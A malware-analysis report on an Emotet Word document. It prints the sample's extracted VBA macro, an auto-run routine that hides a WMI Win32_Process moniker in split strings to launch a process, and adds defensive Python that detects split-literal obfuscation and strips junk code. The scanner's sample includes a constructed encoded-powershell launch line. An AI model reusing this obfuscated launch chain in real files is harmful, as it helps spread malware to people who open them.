Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 8d56a8ad6afa592e…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 176.0 KB
Created: 2019-12-09 20:11:00
Authoring application: Microsoft Office Word
First seen: 2020-01-07
MD5: 68fb79964f8c30cb9f75738bb6ab96df
SHA-1: ecb9e28f02cd7f5a7d026fcd14e312b9c7534303
SHA-256: 8d56a8ad6afa592ed46d6a295b2246ed8b80ee67007799c62b7280a0e953f2c3
Risk score: 322

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1204.002 User Execution: Malicious File
  • T1059 Command and Scripting Interpreter
  • T1059.005 Command and Scripting Interpreter: Visual Basic

The sample contains VBA macros, including a `Document_open` procedure that runs automatically when the document is opened. The macro uses `GetObject` and `CreateObject` with the `winmgmts` moniker to reach WMI and launch a process: in the extracted source the moniker `winmgmts:Win32_Process` is assembled from split literals (`"win" + "mgmt" + "s:Win32_Process"`) and handed to `CreateObject`, so no single string in the module reads `winmgmts`. A process created through `Win32_Process.Create` is spawned by the WMI provider host, so its parent is WmiPrvSE.exe rather than WINWORD.EXE; detections that key only on Office spawning cmd.exe or powershell.exe will miss it. This behavior is characteristic of Emotet, a known downloader family, and is corroborated by the ClamAV signature below.

Heuristics (8)

  • ClamAV: Doc.Downloader.Emotet-7441587-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7441587-0
  • VBA macros detected [medium, 5 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher [critical] OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain; the WMI class name is often hidden through string concatenation or helper functions, as it is in this sample's source.
  • Dangerous API name reassembled from split string literals [critical] OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation has no purpose other than evading keyword scanning.
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open auto-execution macro present
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call present
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace URI that Office writes into ordinary documents; it is not a download or command-and-control indicator.
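The two critical findings above, OLE_VBA_SPLIT_KEYWORD_OBFUSCATION and OLE_VBA_WMI_PROCESS_CREATE, both depend on folding `+`/`&` concatenation chains before looking for keywords. The scanner below is an added example written for this page, not the analyzer's own code: the keyword list, the `Finding` shape, the finding semantics and the sample input are this example's assumptions. The sample reuses the page's own moniker and `CreateObject` lines and adds two constructed lines (an `&` chain and a `.Create` call) so that both heuristics have something to fire on.

```python
"""Fold split VBA string literals and flag the keywords they reassemble.

Added example for this page; it is not the analyzer's own code. The keyword
list, the Finding shape and the sample input are this example's assumptions.
"""
import re
from dataclasses import dataclass

# Assumed keyword list (lower-case substrings), modelled on the examples the
# OLE_VBA_SPLIT_KEYWORD_OBFUSCATION description names plus the WMI names.
DANGEROUS = (
    "scripting.filesystemobject", "wscript.shell", "shell.application",
    "powershell", "urldownloadtofile", "winmgmts", "win32_process",
)

STR_LIT = r'"(?:[^"]|"")*"'            # VBA literal; "" is an escaped quote
IDENT = r'[A-Za-z_][\w.]*'             # variable or Form.Control reference
OPERAND = rf'(?:{STR_LIT}|{IDENT})'
CHAIN = re.compile(rf'{OPERAND}(?:\s*[+&]\s*{OPERAND})*')  # a + "b" & c ...
PART = re.compile(OPERAND)
COMMENT_OR_LIT = re.compile(rf"{STR_LIT}|'")
CREATE_CALL = re.compile(r'\.\s*Create\b', re.IGNORECASE)


@dataclass
class Finding:
    line: int
    keyword: str
    value: str         # the string as it reads once the chain is folded
    split: bool        # True when no single literal contained the keyword
    unresolved: tuple  # identifiers in the chain whose value is unknown


def strip_comment(line):
    """Drop a trailing ' comment without being fooled by a ' inside a literal."""
    for m in COMMENT_OR_LIT.finditer(line):
        if m.group() == "'":
            return line[:m.start()]
    return line


def fold_chain(chain):
    """Return (literal_parts, unresolved_identifiers) for one + / & chain.

    Identifiers contribute nothing to the folded value: an undeclared VBA
    variable is Empty and Empty + "x" is "x", which is exactly what the
    leading `j` in the sample's moniker line does. Their names are kept so
    an analyst can see what the static fold could not resolve.
    """
    parts = PART.findall(chain)
    lits = [p[1:-1].replace('""', '"') for p in parts if p.startswith('"')]
    return lits, tuple(p for p in parts if not p.startswith('"'))


def scan_vba(source):
    """Return (findings, wmi_process_create) for a VBA module's source text."""
    findings, saw_win32_process, saw_create = [], False, False
    for lineno, raw in enumerate(source.splitlines(), 1):
        line = strip_comment(raw)
        saw_create = saw_create or bool(CREATE_CALL.search(line))
        for m in CHAIN.finditer(line):
            lits, idents = fold_chain(m.group())
            if not lits:
                continue                  # chain of bare identifiers, e.g. a + b
            value = "".join(lits)
            for kw in DANGEROUS:
                if kw in value.lower():
                    split = len(lits) > 1 and not any(kw in l.lower() for l in lits)
                    findings.append(Finding(lineno, kw, value, split, idents))
                    saw_win32_process = saw_win32_process or kw == "win32_process"
    # The OLE_VBA_WMI_PROCESS_CREATE condition: Win32_Process plus a .Create call.
    return findings, saw_win32_process and saw_create


# Constructed input: the moniker and CreateObject lines are the page's own
# extracted source; the two lines marked below are invented to give the
# scanner an & chain and a .Create call to work on.
SAMPLE = '''\
Function Xbivpbnb()
Wzdxaknjmslmj = j + "win" + "mgmt" + "s:Win32_Process"
Set Uahcnyrhbzes = CreateObject(Wzdxaknjmslmj)
Cmd = "power" & "shell -e " & Payload      ' constructed, not in the sample
Uahcnyrhbzes.Create Cmd, Null, Null, Pid   ' constructed, not in the sample
End Function
'''

if __name__ == "__main__":
    found, wmi = scan_vba(SAMPLE)
    for f in found:
        print(f"line {f.line}: {f.keyword!r} via {f.value!r} "
              f"split={f.split} unresolved={f.unresolved}")
    print("OLE_VBA_WMI_PROCESS_CREATE:", wmi)
```

Run against the sample it reports `winmgmts` on line 2 as a split keyword, `win32_process` on the same line as a plain hit (the last literal already contains it), `powershell` on line 4 as split, and the WMI chain as present; a lone `GetObject("winmgmts:Win32_Process")` without a `.Create` call does not trip the chain finding. Treating identifiers as empty is faithful to how the sample runs, but a chain whose identifier actually holds a string (a form control value, as `Imcedpfk.Pjlsqgaoogb` does in this macro) can only be resolved by emulation, which is why the unresolved names are reported rather than silently dropped.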

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6006 bytes
SHA-256: 9815b8e725c00315fc777aeedb4e2fb570d5ddbb435714e22875b5355aea0f30

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Imcedpfk"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Pjlsqgaoogb, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Dim Hxuxhuajsnaz, Cormwrtv
If Jfjnybjlxgw > Igyahwrlgculz Then
         Dfbleenclml = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Ocfhmpjg < Lzafdcobyit Then
         Ekkuuemnwfnw = 22
End If
If Mzkjkeopmezkz < Mikfkaxbuo Then
         Dpunizfcco = 355
End If
   Dim Dlhezgbrpvtgt, Yiskjcwywcg
If Khvligvyoon > Xvpwwyjxacbjx Then
         Nkcssmgha = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Mkpktfekfajzf < Rkftbkjo Then
         Luomqnoo = 22
End If
If Zhpivfmrge < Knvwcgfndvfgh Then
         Yomukgwejux = 355
End If
   Dim Htxxuaheq, Ceubcvtdwccun
If Pldqobfeityue > Bcycwsdnbz Then
         Edfzjvvkw = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Uuwzmidapimbz < Fgmycratbb Then
         Pzilnaddhztr = 22
End If
If Yyzrbgdyppxxy < Auxiooahxzbw Then
         Fmvtfscu = 355
End If
Xbivpbnb
End Sub

Attribute VB_Name = "Tmdysygpwknyk"
Attribute VB_Base = "0{1CC9AA49-E8A3-43B7-90FC-260F78C2B9E0}{C24C83C8-2D63-4BDE-967A-ED8D002A6C43}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Yemtlfcccma"
Function Oujdmcxlvud()
   Dim Imoaxwgorxyva, Yxrxpwgsrmjmi
If Zezzrdwkki > Daxvlqdtlj Then
         Actxonjxohy = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Byucmgodkcru < Vfgyqtlypkzwx Then
         Xwcdzksjrzc = 22
End If
If Pabdwpnshj < Kcjkdpip Then
         Gpqrndvpyn = 355
End If
Cstfarqobcvbm = Imcedpfk.Pjlsqgaoogb
   Dim Memzgxvt, Zpyowpebuuao
If Tglrkkzf > Nbdqpjyzyfflr Then
         Hmywabyzl = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Ldjtwuib < Mollwapyuhob Then
         Xaigvocr = 22
End If
If Yuqfjldqilv < Ldbiarxmjsg Then
         Lbfmsudvmcjk = 355
End If
Xpkdzwjgd = Cstfarqobcvbm + Tmdysygpwknyk.Jkjjvyoelqiem + Tmdysygpwknyk.Fxpmnijvroq + Tmdysygpwknyk.Xdzhmicr
   Dim Qagdyacswlzqb, Rrmqwixcbx
If Pnmuxzof > Axxzjldt Then
         Bbtwuugptxe = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Ynfjqbrnpbrq < Xzlyiuqzntqa Then
         Yljvuczmecnr = 22
End If
If Mzcffbjq < Wleyzmtqyyodr Then
         Mtlujlqiqnork = 355
End If
Iseaooqnqdgf = Xpkdzwjgd + Tmdysygpwknyk.Nqfbrwspkr + Tmdysygpwknyk.Vodsbvox
   Dim Doauyajghgejh, Ewwkffee
If Albxbxfde > Kqfwjzcix Then
         Lrthlqcrzjep = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Hjgizgdrytf < Wfbvyqhzkeu Then
         Amavgbgibqw = 22
End If
If Hptszctdglxog < Owelwkfqqdn Then
         Fupevzisgs = 355
End If
Oujdmcxlvud = Jigfqktfkgmol + Iseaooqnqdgf + Jigfqktfkgmol
   Dim Lwtyzujfgb, Tkbicgtn
If Ordtvnjm > Wybmmmpyelea Then
         Ffrbnmfkgji = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Gzvvtrpdviow < Ujuxnnnnqwiy Then
         Mrseksizip = 22
End If
If Omkwceyvla < Uohtiznutc Then
         Qklxjuae = 355
End If
End Function
Function Xbivpbnb()
   Dim Jogurdprnigdz, Tzeyvbru
If Ghiwanias > Quigjywdqdu Then
         Edzuzwst = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Lwgvmuychwk < Vsmdurmbl Then
         Rwonbwlxm = 22
End If
If Kddjisbnksbzd < Txbrozwbdqg Then
         Lkmqayij = 355
End If
Wzdxaknjmslmj = j + "win" + "mgmt" + "s:Win32_Process"
   Dim Svlkodrgktohe, Oxjdosppzdndm
If Jbrlrernmto > Hsbhvfzr Then
         Ledflgaa = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Vkmqshsxkw < Loigcfhhuwdaf Then
         Yfgmtjufwgl = 22
End If
If Nbhjsmtpxee < Xsygmklttrdj Then
         Qjlarqstspu = 355
End If
Set Uahcnyrhbzes = CreateObject(Wzdxaknjmslmj)
   Dim Wqcesyszvncdu, Owmfrsih
If Ohmrdvoyzsxyd > Kpmsxyzsezwdy Then
         Njfgerghr = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Eusgqscghdw < Zopishrqzufns Then
         Hehuajtez = 22
End If
If Darraquf
... (truncated)
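Every procedure above is padded with the same pattern: a `Dim` of two names that are never used, then `If A > B Then ... End If` blocks that compare two variables no line ever assigns. Without `Option Explicit` those names are undeclared Variants holding Empty, and `Empty > Empty`, `Empty < Empty` and `Empty <> Empty` are all False, so the blocks never run. The reducer below is an added example for this page, not a tool from the analysis platform: it applies that rule, drops the unused `Dim` lines and `Attribute` metadata, and then lists which module procedures each surviving procedure calls. Its input is an excerpt of the page's own extracted macro with the repetitive padding cut down; the regexes and the dead-code rule are this example's own.

```python
"""Remove the junk that pads every procedure in the macro above.

Added example for this page, not a tool from the analysis platform. The
input is an excerpt of the page's extracted macro with the repetitive
padding cut down; the regexes and the dead-code rule are this example's own.
"""
import re

PROC_RE = re.compile(r'^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+(\w+)\s*(?:\((.*)\))?', re.I)
END_PROC_RE = re.compile(r'^\s*End\s+(?:Sub|Function)\b', re.I)
# Only < > <> qualify: Empty = Empty, Empty <= Empty and Empty >= Empty are True.
DEAD_IF_RE = re.compile(r'^\s*If\s+([A-Za-z_]\w*)\s*(<>|<|>)\s*([A-Za-z_]\w*)\s+Then\s*$', re.I)
BLOCK_IF_RE = re.compile(r'^\s*If\b.*\bThen\s*$', re.I)
END_IF_RE = re.compile(r'^\s*End\s+If\b', re.I)
DIM_RE = re.compile(r'^\s*Dim\s+(.+?)\s*$', re.I)
ASSIGN_RE = re.compile(r'^\s*(?:Set\s+|Const\s+)?([A-Za-z_]\w*)\s*=', re.I)
ATTR_RE = re.compile(r'^\s*Attribute\s+VB_', re.I)
IDENT_RE = re.compile(r'[A-Za-z_]\w*')


def defined_names(lines):
    """Names that may hold a value: procedure names and parameters, Dim'd
    names, assignment / Set / Const targets. Everything else is an undeclared
    Variant, i.e. Empty, because none of the modules says Option Explicit."""
    names = set()
    for line in lines:
        m = PROC_RE.match(line)
        if m:
            names.add(m.group(1).lower())
            names.update(n.lower() for n in IDENT_RE.findall(m.group(2) or ""))
        m = ASSIGN_RE.match(line) or DIM_RE.match(line)
        if m:
            names.update(n.lower() for n in IDENT_RE.findall(m.group(1)))
    return names


def strip_junk(source):
    """Return the live lines: dead If blocks, unused Dim lines and Attribute
    metadata removed. When in doubt a line is kept."""
    lines = source.splitlines()
    defined = defined_names(lines)
    referenced = set()                      # identifiers used outside Dim lines
    for line in lines:
        if not DIM_RE.match(line):
            referenced.update(n.lower() for n in IDENT_RE.findall(line))
    live, i = [], 0
    while i < len(lines):
        line = lines[i]
        m = DEAD_IF_RE.match(line)
        if m and not {m.group(1).lower(), m.group(3).lower()} & defined:
            # Both operands are Empty, so the comparison is False and the
            # block never runs: skip to the matching End If.
            depth, i = 1, i + 1
            while depth and i < len(lines):
                if BLOCK_IF_RE.match(lines[i]):
                    depth += 1
                elif END_IF_RE.match(lines[i]):
                    depth -= 1
                i += 1
            continue
        d = DIM_RE.match(line)
        if d and not {n.lower() for n in IDENT_RE.findall(d.group(1))} & referenced:
            i += 1                          # declared but never used anywhere
            continue
        if line.strip() and not ATTR_RE.match(line):
            live.append(line.strip())
        i += 1
    return live


def call_graph(live):
    """Map each procedure to the module procedures its live body mentions."""
    procs = {m.group(1) for m in map(PROC_RE.match, live) if m}
    graph, current = {}, None
    for line in live:
        m = PROC_RE.match(line)
        if m:
            current = m.group(1)
            graph[current] = []
        elif END_PROC_RE.match(line):
            current = None
        elif current:
            for name in IDENT_RE.findall(line):
                if name in procs and name != current and name not in graph[current]:
                    graph[current].append(name)
    return graph


# Excerpt of the page's extracted macro (padding reduced to one or two
# blocks per procedure); the lines themselves are the sample's own.
SAMPLE = '''\
Attribute VB_Name = "Imcedpfk"
Private Sub Document_open()
   Dim Hxuxhuajsnaz, Cormwrtv
If Jfjnybjlxgw > Igyahwrlgculz Then
         Dfbleenclml = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Ocfhmpjg < Lzafdcobyit Then
         Ekkuuemnwfnw = 22
End If
Xbivpbnb
End Sub
Function Xbivpbnb()
   Dim Jogurdprnigdz, Tzeyvbru
If Ghiwanias > Quigjywdqdu Then
         Edzuzwst = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
Wzdxaknjmslmj = j + "win" + "mgmt" + "s:Win32_Process"
Set Uahcnyrhbzes = CreateObject(Wzdxaknjmslmj)
End Function
'''

if __name__ == "__main__":
    live = strip_junk(SAMPLE)
    print("\n".join(live))
    print(call_graph(live))
```

On the excerpt the reducer leaves seven lines: `Document_open` does nothing but call `Xbivpbnb`, and `Xbivpbnb` builds the moniker and calls `CreateObject` on it. The rule is deliberately narrow, a comparison whose operand is assigned, declared, or passed as a parameter anywhere in the module is kept, so the reducer never removes a branch that could run; the same pattern with a different operator set or with operands seeded from form controls would need emulation instead.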